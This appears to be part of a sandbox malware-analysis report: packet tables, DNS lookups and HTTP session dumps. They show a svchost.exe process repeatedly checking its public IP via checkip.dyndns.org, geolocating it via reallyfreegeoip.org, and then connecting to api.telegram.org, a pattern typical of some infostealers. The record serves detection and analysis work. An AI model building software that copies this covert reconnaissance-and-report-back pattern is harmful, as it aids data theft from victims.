                                                                                                                                                                                  Oct 24, 2024 18:36:07.738595963 CEST49802443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:07.759752035 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.760482073 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.914303064 CEST8049801158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.914494038 CEST4980180192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.915579081 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:07.915779114 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:07.915836096 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.070884943 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.071583033 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072547913 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072587967 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072848082 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072973967 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.072994947 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.114798069 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.272279024 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.273708105 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.273765087 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.543697119 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.543943882 CEST44349804104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.544199944 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.544492960 CEST49804443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.563353062 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.563991070 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.718462944 CEST8049803158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.718749046 CEST4980380192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.718874931 CEST8049805158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.719089031 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.719151974 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:08.873964071 CEST8049805158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.876076937 CEST8049805158.101.44.242192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877166986 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877197981 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877372980 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877557039 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:08.877567053 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:08.927073002 CEST4980580192.168.11.20158.101.44.242
                                                                                                                                                                                  Oct 24, 2024 18:36:09.076153994 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.077512980 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:09.077564955 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318010092 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318306923 CEST44349806104.21.67.152192.168.11.20
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318531990 CEST49806443192.168.11.20104.21.67.152
                                                                                                                                                                                  Oct 24, 2024 18:36:09.318762064 CEST49806443192.168.11.20104.21.67.152
Oct 24, 2024 18:36:09.383114100 CEST | 49805 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:09.479732990 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Oct 24, 2024 18:36:09.479821920 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:09.480029106 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Oct 24, 2024 18:36:09.480309010 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Oct 24, 2024 18:36:09.480366945 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:09.538110971 CEST | 80 | 49805 | 158.101.44.242 | 192.168.11.20
Oct 24, 2024 18:36:09.538321972 CEST | 49805 | 80 | 192.168.11.20 | 158.101.44.242
Oct 24, 2024 18:36:09.843854904 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:09.844181061 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Oct 24, 2024 18:36:09.846040964 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Oct 24, 2024 18:36:09.846059084 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:09.846398115 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:09.847774982 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Oct 24, 2024 18:36:09.888062000 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:10.173815012 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:10.173945904 CEST | 443 | 49807 | 149.154.167.220 | 192.168.11.20
Oct 24, 2024 18:36:10.174154043 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Oct 24, 2024 18:36:10.176572084 CEST | 49807 | 443 | 192.168.11.20 | 149.154.167.220
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 24, 2024 18:36:00.893542051 CEST | 56236 | 53 | 192.168.11.20 | 1.1.1.1
Oct 24, 2024 18:36:00.988576889 CEST | 53 | 56236 | 1.1.1.1 | 192.168.11.20
Oct 24, 2024 18:36:01.884946108 CEST | 65532 | 53 | 192.168.11.20 | 1.1.1.1
Oct 24, 2024 18:36:01.980715990 CEST | 53 | 65532 | 1.1.1.1 | 192.168.11.20
Oct 24, 2024 18:36:09.383492947 CEST | 54183 | 53 | 192.168.11.20 | 1.1.1.1
Oct 24, 2024 18:36:09.479007959 CEST | 53 | 54183 | 1.1.1.1 | 192.168.11.20
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 24, 2024 18:36:00.893542051 CEST | 192.168.11.20 | 1.1.1.1 | 0x309d | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:01.884946108 CEST | 192.168.11.20 | 1.1.1.1 | 0x61b7 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:09.383492947 CEST | 192.168.11.20 | 1.1.1.1 | 0x82cb | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 24, 2024 18:36:00.988576889 CEST | 1.1.1.1 | 192.168.11.20 | 0x309d | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Oct 24, 2024 18:36:00.988576889 CEST | 1.1.1.1 | 192.168.11.20 | 0x309d | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:00.988576889 CEST | 1.1.1.1 | 192.168.11.20 | 0x309d | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:00.988576889 CEST | 1.1.1.1 | 192.168.11.20 | 0x309d | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:00.988576889 CEST | 1.1.1.1 | 192.168.11.20 | 0x309d | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:00.988576889 CEST | 1.1.1.1 | 192.168.11.20 | 0x309d | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:01.980715990 CEST | 1.1.1.1 | 192.168.11.20 | 0x61b7 | No error (0) | reallyfreegeoip.org | | 104.21.67.152 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:01.980715990 CEST | 1.1.1.1 | 192.168.11.20 | 0x61b7 | No error (0) | reallyfreegeoip.org | | 172.67.177.134 | A (IP address) | IN (0x0001) | false
Oct 24, 2024 18:36:09.479007959 CEST | 1.1.1.1 | 192.168.11.20 | 0x82cb | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
• reallyfreegeoip.org
• api.telegram.org
• checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49790 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:01.156035900 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 24, 2024 18:36:01.313177109 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:01 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 62033393a02b4528f4963aba2fdd926d
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>
Oct 24, 2024 18:36:01.322102070 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 24, 2024 18:36:01.479409933 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:01 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a0c10087d533f06e5c82a07901dbc089
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>
Oct 24, 2024 18:36:02.848227024 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 24, 2024 18:36:03.004323006 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:02 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: b69653bb14b79f23cb5458509549e3e9
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49793 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:03.618169069 CEST | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Oct 24, 2024 18:36:03.774074078 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:03 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 3a2682d61b3d3a6e1482113907fe4a8f
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49795 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:04.387542963 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 24, 2024 18:36:04.545656919 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:04 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: dab4f29261ac0d56cd920e2325d33da1
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.11.20 | 49797 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe
Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:05.166466951 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 24, 2024 18:36:05.740911961 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:05 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: efc3f4ef8377b249050f9897622af240
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.11.20 | 49799 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:06.359904051 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 24, 2024 18:36:06.517585993 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:06 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: a5313a3475e7cfc8eab12e714a110567
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.11.20 | 49801 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:07.130979061 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 24, 2024 18:36:07.288815022 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:07 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: cf3f99e5cba2d1ef998f83fae9dafe91
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.11.20 | 49803 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:07.915836096 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 24, 2024 18:36:08.071583033 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:08 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 6b2d907e4b159e89228cdd56f9081957
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.11.20 | 49805 | 158.101.44.242 | 80 | 8376 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
Oct 24, 2024 18:36:08.719151974 CEST | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Oct 24, 2024 18:36:08.876076937 CEST | 323 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:08 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 0b00e64086a2b8133633b31cd5f1a1e3
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 154.16.192.225</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49791 | 104.21.67.152 | 443 | 8376 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:02 UTC | 87 | OUT | GET /xml/154.16.192.225 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
2024-10-24 16:36:02 UTC | 882 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:02 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: MISS
Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QCzrxfOKiZFQhIpB2tilVIEmaA7BEzB4%2Fmw169ZrywZcxmyYIKmfES32bnj08melGuagZyj3xbftIRQQ12%2BnvHzlYn561pTc%2BRR4VdTBS55go6CWJ4nTs4is0pJmlA0nq8qBAthn"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7b622aefb6430d-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=95299&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=40103&cwnd=252&unsent_bytes=0&cid=3da19bef7b8569be&ts=646&x=0"
2024-10-24 16:36:02 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:02 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.11.20 | 49792 | 104.21.67.152 | 443 | 8376 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:03 UTC | 63 | OUT | GET /xml/154.16.192.225 HTTP/1.1
Host: reallyfreegeoip.org
2024-10-24 16:36:03 UTC | 887 | IN | HTTP/1.1 200 OK
Date: Thu, 24 Oct 2024 16:36:03 GMT
Content-Type: application/xml
Transfer-Encoding: chunked
Connection: close
access-control-allow-origin: *
vary: Accept-Encoding
Cache-Control: max-age=86400
CF-Cache-Status: HIT
Age: 1
Last-Modified: Thu, 24 Oct 2024 16:36:02 GMT
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lkJd8E0B5hnh1vImXr6pexk1QzxCEa4a92e%2FVDQL14ZX4eByX5JuW72OKZ2Crg83soT%2FCUc1Zz7f4igecDRMbGHRzG27pYTVKApZ7tKWCXyLR8uumqAXUJWD7W6Fr5fbKAWzSCma"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8d7b62313cfd41ed-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=95250&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2851&recv_bytes=701&delivery_rate=40103&cwnd=252&unsent_bytes=0&cid=9903142d99aa4876&ts=258&x=0"
2024-10-24 16:36:03 UTC | 366 | IN | Data Raw: 31 36 37 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 34 2e 31 36 2e 31 39 32 2e 32 32 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 30 31 33 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c
Data Ascii: 167<Response><IP>154.16.192.225</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10013</ZipCode><TimeZone>America/New_York<
2024-10-24 16:36:03 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.11.20 | 49794 | 104.21.67.152 | 443 | 8376 | C:\Windows\SysWOW64\svchost.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-24 16:36:03 UTC | 63 | OUT | GET /xml/154.16.192.225 HTTP/1.1
